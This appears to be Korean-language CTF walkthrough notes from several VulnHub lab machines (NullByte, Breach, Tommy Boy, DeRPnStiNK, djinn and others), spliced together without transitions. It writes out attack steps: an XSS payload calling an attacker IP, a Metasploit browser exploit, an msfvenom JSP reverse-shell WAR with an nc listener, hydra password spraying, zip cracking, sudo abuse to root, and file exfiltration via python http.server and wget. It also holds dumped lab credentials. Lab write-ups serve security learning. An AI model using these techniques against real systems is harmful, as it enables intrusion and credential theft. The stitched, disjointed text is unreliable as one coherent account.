www-data@Milburg-High:/home/bob/Documents$ cat staff.txt
Seb:
Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him
James:
Does nothing
Pretty Lazy
Doesn't give a shit about his job
Elliot:
Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
www-data@Milburg-High:/home/bob/Documents$ ls
Secret login.txt.gpg staff.txt
www-data@Milburg-High:/home/bob/Documents$ cd Secret/
www-data@Milburg-High:/home/bob/Documents/Secret$ ls
Keep_Out
www-data@Milburg-High:/home/bob/Documents/Secret$ cd Keep_Out/
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ ls
Not_Porn Porn
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out$ cd Not_Porn/
www-data@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn$ ls
No_Lookie_In_Here
<nts/Secret/Keep_Out/Not_Porn$ cd No_Lookie_In_Here/
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ls
notes.sh
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
근데 현 유저에서는 권한이 없어서 불가능하니 이전에 획득했던 계정 정보로 로그인해서 시도해보겠습니다
www-data@Milburg-High:/home/bob/Documents$ su jc
Password:
jc@Milburg-High:/home/bob/Documents$ ls
login.txt.gpg Secret staff.txt
jc@Milburg-High:/home/bob/Documents$ gpg
gpg: keybox '/home/jc/.gnupg/pubring.kbx' created
gpg: WARNING: no command supplied. Trying to guess what you mean ...
gpg: Go ahead and type your message ...
^C
gpg: signal Interrupt caught ... exiting
<ocuments$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
# bob Credentials
bob:b0bcat_
sudo 가 가능한 유저입니다
Privilege Escalation
bob@Milburg-High:~$ sudo -l
\
sudo: unable to resolve host Milburg-High: Connection timed out
[sudo] password for bob:
Sorry, try again.
[sudo] password for bob:
Matching Defaults entries for bob on Milburg-High:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on Milburg-High:
(ALL : ALL) ALL
ramses@NullByte:~$ cat .bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
ramses@NullByte:~$ sudo -l
[sudo] password for ramses:
Sorry, user ramses may not run sudo on NullByte.
ramses@NullByte:~$ cd /var/www
ramses@NullByte:/var/www$ ls
backup html
ramses@NullByte:/var/www$ cd backup
ramses@NullByte:/var/www/backup$ ls
procwatch readme.txt
ramses@NullByte:/var/www/backup$ ls -al
total 20
drwxrwxrwx 2 root root 4096 Aug 2 2015 .
drwxr-xr-x 4 root root 4096 Aug 2 2015 ..
-rwsr-xr-x 1 root root 4932 Aug 2 2015 procwatch
-rw-r--r-- 1 root root 28 Aug 2 2015 readme.txt
ramses@NullByte:/var/www/backup$ cat readme.txt
I have to fix this mess...
ramses@NullByte:/var/www/backup$ file procwatch
procwatch: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=17d666a0c940726b29feedde855535fb21cb160c, not stripped
ramses@NullByte:/var/www/backup$ ./procwatch
PID TTY TIME CMD
1598 pts/0 00:00:00 procwatch
1599 pts/0 00:00:00 sh
1600 pts/0 00:00:00 ps
ramses@NullByte:/var/www/backup$
procwatch라는 바이너리는 관리자 권한으로 실행 될 수 있도록 suid 설정이 되어있습니다
└─$ sudo nmap -p 111,51891,65535 -Pn -n --open -sV -sC -iL scope.txt -oA ./recon/tcpDetailed
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 02:54 EDT
Nmap scan report for 192.168.110.151
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 41558/tcp6 status
| 100024 1 44049/udp status
| 100024 1 51891/tcp status
|_ 100024 1 55652/udp6 status
51891/tcp open status 1 (RPC #100024)
65535/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
| 2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
| 256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
|_ 256 3b:4d:56:37:5e:c3:45:75:15:cd:85:00:4f:8b:a8:5e (ED25519)
MAC Address: 00:0C:29:FB:15:58 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.13 seconds
얻은 정보
Peter:inthesource
바로 종료되어버렸는데요, 포트스캐닝을 다시 돌려보겠습니다
└─$ sudo nmap -p- -iL scope.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-23 03:08 EDT
Nmap scan report for 192.168.110.151
Host is up (0.0023s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
51891/tcp open unknown
65535/tcp open unknown
MAC Address: 00:0C:29:FB:15:58 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
비밀번호가 입력되면서 80번 포트가 트리거 되는가봅니다
한번 접속해서 정보 수집을 계속 진행해보겠습니다
HTTP
페이지 소스, robots.txt 는 별다른 특이사항 없습니다
gobuster를 이용해 디렉터리 브루트포싱을 진행해보겠습니다
Vulnerability
/blog 경로를 추가해 한번더 디렉터리 브루트포싱을 진행해봅니다
/smilies에서는 별다른 특이사항 없었음
tinymce 라는 폴더가 있습니다
아까 웹 사이트에서 봤을때는 활용할 만한 특이점이 없었던 것같고,
blogphp에 대한 취약점을 검색합니다
Exploitation
XSS와 SQL Injection이 가능한 취약점이 있습니다 CVE-2008-6745 코드도 있군요
XSS를 이용해 대상 호스트의 쉘을 우선 획득해보겠습니다
register.html에서 회원가입하는 username을 <img src="http://192.168.110.129:2222"> 로 해줍니다
그전에 nc를 이용한 리스닝 먼저해야겠죠?
└─$ nc -lvp 2222
이렇게 request를 받을 수 있습니다 웹 사이트는
계속 대기중입니다 테스트를 했으니
이제 metasploit을 이용해서 대상 호스트의 쉘을 획득해보겠습니다
이번엔 <iframe src="http://192.168.110.129:2345"></iframe> 을 이용해서 유저를 생성합니다
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvhost 192.168.110.129
srvhost => 192.168.110.129
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set srvport 1234
srvport => 1234
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set uripath /
uripath => /
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set lport 3333
lport => 3333
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > exploit
이 과정을 설명드리자면,
1. nc로 대상호스트의 XSS 취약점을 이용해 공격자 PC 에서 리스닝한다
2. 공격자 PC에서 리스닝되어있는 nc을 이용해 대상호스트에 대한 쉘을 획득한다.
정도가 되겠습니다
근데,, 에러가 발생해서 이정도 기법을 이해하는 정도로 하고 마무리하겠습니다..
다음에 다시 도전해보겠습니다
SQL injection이 가능하다고 해서 아래 코드와 같이 sqlmap을 이용해서 admin 계정에 대한 해시화된 비밀번호 획득 그리고 MD5 복호화를 통해 admin 획득 완료 했습니다
# ftp - 21
└─$ ftp 192.168.110.140
Connected to 192.168.110.140.
550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00421 Service not available, remote server has closed connection.
ftp> ls
Not connected.
#smtp - 25
└─$ telnet 192.168.110.140 25
Trying 192.168.110.140...
Connected to 192.168.110.140.
Escape character is '^]'.
550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00Connection closed by foreign host.
# mount
└─$ showmount -e 192.168.110.140
clnt_create: RPC: Unable to receive
# smb - 445
└─$ smbclient -L 192.168.110.140
Protocol negotiation to server 192.168.110.140 (for a protocol between LANMAN1 and SMB3) failed: NT_STATUS_CONNECTION_RESET
얻은 계정 정보로 /_M@nag3Me/html로 접속해봅니다 물론 포트는 8443 이겠죠? 명심하셔야합니다 그리고 앞에 https를 붙여야합니다!
이제 공격을 해야할 때가 왔습니다
이 tomcat 관리자 페이지에 접속을 하면 리버스쉘로 이루어진 war 파일을 업로드하면 리버스쉘을 획득 할 수 있습니다
Exploitation
msfvenom 툴을 이용해서 페이로드를 생성해봅니다
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=7777 -f war -o revshell.war
Payload size: 1098 bytes
Final size of war file: 1098 bytes
Saved as: revshell.war
# reverse shell listening
└─$ nc -nlvp 7777
listening on [any] 7777 ...
/revshell을 클릭해줍니다!
대상 호스트에 초기 침투 완료했습니다
Post-Exploitation
여기저기 찾아보다가 777권한을 가진 디렉터리 /var/www/5446를 발견했고, php 파일에서 데이터베이스에 대한 정보를 획득 했습니다
tomcat6@Breach:/var/www/5446$ cat 0d93f85c5061c44cdffeb8381b2772fd.php
<?php
/**
* All information in order to connect to database are going through here.
*
* Be careful if you are changing data's in this file.
*
* @copyright http://www.xoops.org/ The XOOPS Project
* @copyright XOOPS_copyrights.txt
* @copyright http://www.impresscms.org/ The ImpressCMS Project
* @license http://www.gnu.org/licenses/old-licenses/gpl-2.0.html GNU General Public License (GPL)
* @package installer
* @since 1.0
* @author marcan <marcan@impresscms.org>
* @author Sina Asghari (aka stranger) <pesian_stranger@users.sourceforge.net>
* @version $Id: sdata.dist.php 8570 2009-04-11 13:15:53Z icmsunderdog $
*/
// Database Hostname
// Hostname of the database server. If you are unsure, 'localhost' works in most cases.
define( 'SDATA_DB_HOST', 'localhost' );
// Database Username
// Your database user account on the host
define( 'SDATA_DB_USER', 'root' );
// Database Password
// Password for your database user account
define( 'SDATA_DB_PASS', '' );
// Database Name
// The name of database on the host. The installer will attempt to create the database if not exist
define( 'SDATA_DB_NAME', 'impresscms' );
// Table Prefix
// This prefix will be added to all new tables created to avoid name conflict in the database. If you are unsure, just use the default 'icms'
define( 'SDATA_DB_PREFIX', 'ia44db101' );
// Password Salt Key $mainSalt
// This salt will be appended to passwords in the icms_encryptPass() function.
// Do NOT change this once your site is Live, doing so will invalidate everyones Password.
define( 'SDATA_DB_SALT', 'EQ9eLioElpacrtYZFQrGiDvB5OQGXzq2jfA4okdsZzkVNGhka6blxUTrozLOuFSA4' );
비밀번호가 없네요!! 한번 접속해봅니다
?>tomcat6@Breach:/var/www/5446$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 104
Server version: 5.5.49-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| impresscms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.03 sec)
mysql> use mysql;
mysql> show tables;
mysql> select Host,User,Password from user;
+-----------+------------------+-------------------------------------------+
| Host | User | Password |
+-----------+------------------+-------------------------------------------+
| localhost | root | |
| | milton | 6450d89bd3aff1d893b85d3ad65d2ec2 |
| 127.0.0.1 | root | |
| ::1 | root | |
| localhost | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
+-----------+------------------+-------------------------------------------+
5 rows in set (0.00 sec)
milton@Breach:~$ cat /usr/share/cleanup/tidyup.sh
#!/bin/bash
#Hacker Evasion Script
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.
cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf
매 3분마다 아래의 스크립트가 실행됩니다. 근데 쓰기 권한이 없어 다른 쓰기 권한이 있는 파일을 찾아야합니다
└─$ sudo nmap -sn 192.168.45.0/24
Nmap scan report for 192.168.45.124
Host is up (0.00036s latency).
MAC Address: 08:00:27:C0:50:B6 (Oracle VirtualBox virtual NIC)
이번엔 웹 해킹이 위주일 것 같은 느낌입니다
HTTP - 80, 8008
우선 80부터 접속해봅니다
시스템에 에러가 났다고 합니다. Nick..
페이지 소스에 주석 표시되어있는 정보 입니다.
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal. Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8-->
<!--Comment from Richard: Ah! How could I forget? Thanks-->
백업은 톰의 홈디렉터리에 되어있고, 톰이 뭔가 중요한 정보를 회사 블로그에 저장하고 있다네요
그리고 크게 싸웟을때의 장소 이름을 따서 디렉터리를 만들었다는데, 유튜브 링크도 있네요
유튜브 동영상에서 확인한 장소입니다.
/prehistoricforest
계속 /robots.txt 를 확인해봅니다
다들 디렉터리에 사진이 들어있고, 별다른 특이사항은 없습니다
그리고 첫번째 플래그입니다. 5개가 있다고하네요
1/5 - B34rcl4ws
이번엔 8008포트로 접속해봅니다
일단 8008포트의 웹사이트에서는 별다른 특이사항 없습니다
Vulnerability
우선 gobuster 툴을 이용한 디렉터리 브루트포싱과 nikto를 이용한 잠재적 취약점 진단 부터 실시합니다
80
디렉터리 브루트 포싱을 진행했을때 200 응답만 출력한 이유가 워드리스트 파일에서 브루트포싱을 하면 전부다 301 에러가 발생하여 표출됬는데, nikto에서도 동일한 결과가 나왔습니다. 그래서 직접 접속해보니.
다들 이런식으로 디렉터리가 생성되어있네요
그렇다면 이전에 얻었던 단서 /prehistoricforest 경로를 우선 들어가봅니다
오호 wordpress로 구성된 callahan 직원 블로그입니다
wpscan을 이용해서 유저 정보 획득 해주고 블로그를 한번 살펴봅니
#username
tommy
richard
tom
Tom Jr.
Big Tom
michelle
그리고 아까 블로그에 뭔가 중요한 정보를 많이 입력한다고 했었죠? 그리고 /richard 디렉터리에 있는게 뭔가 기억을 되살려줄거랍니다... 그럼 다운 받아서 확인해봅니다
Michelle/Tommy,
This is f’d up.
I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:
Hey Richy,
So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.
Here’s everything I know:
You guys are all hopeless sheep :-/
The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.
I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).
You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.
Good luck, schmucks!
LOL
-Nick
Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!
-Richard
음... 일단 Big Tom 계정으로 SSH를 이용해야한다.
Nick의 홈디렉터리에는 다른 정보 들이 존재한다.
callahanbak.bak이라는 백업 파일을 index.html로 바꿔주면 정상적으로 동작이 될 것이다
불안정한 FTP 서버가 있는데, 매시 정각에 15분 사용가능, 15분동안 오프라인 상태이다
tom의 비밀번호는 획득했는데, 이전에 편지에 보면 유저네임이 실제 사용하는 이름과 다르다는 말이 있었습니다
그렇다면,, 다른 방법으로는 ftp를 활용하는 방법인데, nmap을 이용해서 포트 스캐닝을 다시 해줍니다
65534 포트인가보네요
간단한 비밀번호를 사용한다고 했으니, 리스트 하나 작성해봅니다
└─$ cat ftp_pw.txt
password
pass
password123!
nick
nickburns
이후 hydra를 이용해 비밀번호 스프레잉 공격을 진행합니다
시간이 얼마 없어요!!
# Credentials
nickburns:nickburns
└─$ ftp 192.168.45.124 65534
Connected to 192.168.45.124.
220 Callahan_FTP_Server 1.3.5
Name (192.168.45.124:kali): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||26591|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 nickburns nickburns 977 Jul 15 2016 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||43711|)
150 Opening BINARY mode data connection for readme.txt (977 bytes)
100% |****************************************************************************************************************| 977 16.13 KiB/s 00:00 ETA
226 Transfer complete
977 bytes received in 00:00 (15.67 KiB/s)
└─$ cat readme.txt
To my replacement:
If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!
Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.
Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what?
He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet.
Good luck, schmuck!
LOL.
-Nick
NickIzL33t이라는 디렉터리가 서버 어딘가에 있고, Big Tom이 비밀번호를 항상 까먹어서 encrypted.zip 파일로 압축을 해놓았다고 합니다
여전한데요...
스티브 잡스 얘기를 하는거보니 프록시 도구를 이용해서 User-Agent를 IOS로 변경해서 진행해봅니다
ㅋㅋ킼 html 확장자로 찾아보라는 단서만 발견했습니다
그래서 뭔가 찾아야하는데 user-agent를 변경하는 옵션이 있는 ffuf 툴을 이용해봅니다
Big Tom,
Your password vault is protected with (yep, you guessed it) a PASSWORD!
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!
Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:
* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters
Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one
big chunk ok? Heh, "big chunk." A big chunk typing big chunks. That's funny.
LOL
-Nick
비밀번호 리스트를 만들었고, zip 파일의 비밀번호를 해독하기 위해 fcrackzip 이라는 툴을 사용해보겠습니다
툴을 사용하고 있을때 다시 한번 지금 하고 있는것에 대한 생각을 해보자면,
Big Tom 으로 SSH로 접속을 해야하는데, 비밀번호는 워드프레스에서 획득을 했지만 규칙적인 유저 이름으로 생성하지 않아 블로그와 다른 이름으로 유저가 생성되어 있어서 현재 그 유저네임을 찾고 있습니다
# Credentials
tom(?):1938!!
└─$ fcrackzip -v -u -D -p unzip_pw.txt ./t0msp4ssw0rdz.zip
found file 'passwords.txt', (size cp/uc 332/ 641, flags 9, chk 9aad)
checking pw bevG72kn~1995
PASSWORD FOUND!!!!: pw == bevH00tr$1995
└─$ unzip t0msp4ssw0rdz.zip
Archive: t0msp4ssw0rdz.zip
[t0msp4ssw0rdz.zip] passwords.txt password:
inflating: passwords.txt
┌──(kali㉿kali)-[~/vulnhub/tommyboy]
└─$ cat passwords.txt
Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money
TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding
Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat
Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.
Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
제가 알아야할 것은 Auto Server의 Username 입니다
1938!!과 병합해서 SSH 접속을 해봅니다
bigtommysenior:fatguyinalittlecoat1938!!
대상 호스트 초기 침투 완료
드디어 Big Tom,,장악 완료
Post-Exploitation
bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.
Flag data: EditButton
But...but...where's flag 5?
I'll make it easy on you. It's in the root of this server at /5.txt
4/5 - EditButton
5번째 플래그는 /5.txt 랍니다
일단 이전에 백업파일을 /var/www/html/index.html로 변경하면 정상적으로 웹사이트가 운영된다고 했는데요 한번 해보겠습니다
└─$ cat journal.txt
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade paint solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was a password that was safe? Or a password to a safe? Or a safe password to a safe?
Anyway. Here it is:
FLAG: {131333} - 20 Points
80/130
└─$ chmod +x safe
└─$ ./safe
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
crunch 툴을 이용하여 대문자 하나, 숫자 하나를 넣은 무작위 단어를 만든 후에 무작위 생성된 두 단어를 합쳐 hydra를 이용해 비밀번호 스프레잉 공격을 진행해보겠습니다
└─$ crunch 7 7 -t ,%Flesh -o ./flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
┌──(kali㉿kali)-[~/vulnhub/rick]
└─$ crunch 10 10 -t ,%Curtains -o ./curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
┌──(kali㉿kali)-[~/vulnhub/rick]
└─$ cat flesh.txt > passwd.txt
┌──(kali㉿kali)-[~/vulnhub/rick]
└─$ cat curtains.txt >> passwd.txt
└─$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
# private key
└─$ cat key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
...
...
...
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
└─$ chmod 600 key.txt
└─$ ssh -i key.txt stinky@192.168.45.206
pcap 파일 발견 -> 대상 호스트에서 python을 이용하여 웹서버를 열어서 공격자 칼리로 파일을 전송
/weblog/wp-login.php에서 mrderp 유저로 로그인하는 패킷을 확인한 결과 계정 정보를 획득할 수 있었습니다
# Credentials
mrderp:derpderpderpderpderpderpderp
mrderp의 홈디렉터리에는 sudo에서 설정된 바이너리가 없다
/bin/bash 바이너리를 실행하는 스크립트를 만들어 실행하여 관리자 권한을 획득 할 수 있게 진행한다
mrderp@DeRPnStiNK:~$ mkdir binaries; cd binaries
mrderp@DeRPnStiNK:~/binaries$ echo '/bin/bash' > derpy.sh; chmod +x derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# id; hostname; ip a
uid=0(root) gid=0(root) groups=0(root)
DeRPnStiNK
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:11:4d:a8 brd ff:ff:ff:ff:ff:ff
inet 192.168.45.206/24 brd 192.168.45.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe11:4da8/64 scope link
valid_lft forever preferred_lft forever
root@DeRPnStiNK:/root/Desktop# ls
flag.txt
root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(.....)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
다양한 문자열에 대해서 필터링을 하고 있엇네요 그리고 .dev 디렉터리에 있는 creds.txt
# credentials
nitish:p4ssw0rdStr3r0n9
그리고 ssh로 접근하려했는데 filtered 상태였죠??
포트 노킹이 가능할 듯합니다
공격자 PC에서 포트 노킹을 시도합니다
이제 열렸네요!!
Privilege Escalation
user.txt의 플래그 값입니다
이제 권한 상승을 해야겠죠
nitish@djinn:~$ sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
$ sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
뭔가를 맞추거나 찾아야하는 것 같습니다... 이 ctf 재밌게 만들었네요 sam의 홈디렉터리로 가서 단서가 있는지 확인해봅니다
$ pwd
/home/sam
$ ls -al
total 36
drwxr-x--- 4 sam sam 4096 Nov 14 2019 .
drwxr-xr-x 4 root root 4096 Nov 14 2019 ..
-rw------- 1 root root 417 Nov 14 2019 .bash_history
-rw-r--r-- 1 root root 220 Oct 20 2019 .bash_logout
-rw-r--r-- 1 sam sam 3771 Oct 20 2019 .bashrc
drwx------ 2 sam sam 4096 Nov 11 2019 .cache
drwx------ 3 sam sam 4096 Oct 20 2019 .gnupg
-rw-r--r-- 1 sam sam 807 Oct 20 2019 .profile
-rw-r--r-- 1 sam sam 1749 Nov 7 2019 .pyc
-rw-r--r-- 1 sam sam 0 Nov 7 2019 .sudo_as_admin_successful
$ strings .pyc
getuser(
system(
randintc
Working on it!! (
/home/mzfr/scripts/exp.pyt
naughtyboi
Choose a number between 1 to 100: s
Enter your number: s
/bin/shs
Better Luck next time(
inputR
numt
/home/mzfr/scripts/exp.pyt
guessit
Enter the full of the file to read: s!
User %s is not allowed to read %s(
usert
path(
/home/mzfr/scripts/exp.pyt
readfiles
What do you want to do ?s
1 - Be naughtys
2 - Guess the numbers
3 - Read some damn filess
4 - Works
Enter your choice: (
intR
choice(
/home/mzfr/scripts/exp.pyt
options
work your ass off!!s"
Do something better with your life(
/home/mzfr/scripts/exp.pyt
main'
__main__N(
getpassR
randomR
__name__(
/home/mzfr/scripts/exp.pyt
<module>
컴파일된 pyc 파일을 디컴파일해서 어떤 코드로 만들었는지 확인해야 겠네요,,ㅎ 리버싱하는 느낌이에요
# pyc 파일을 디컴파일하는 uncompyle6 install
└─$ pip install uncompyle6
대상 호스트에서 웹 서버를 열어 줍니다
$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
# kali
└─$ wget http://192.168.45.195:1234/.pyc
--2024-07-11 18:32:47-- http://192.168.45.195:1234/.pyc
Connecting to 192.168.45.195:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1749 (1.7K) [application/octet-stream]
Saving to: ‘.pyc’
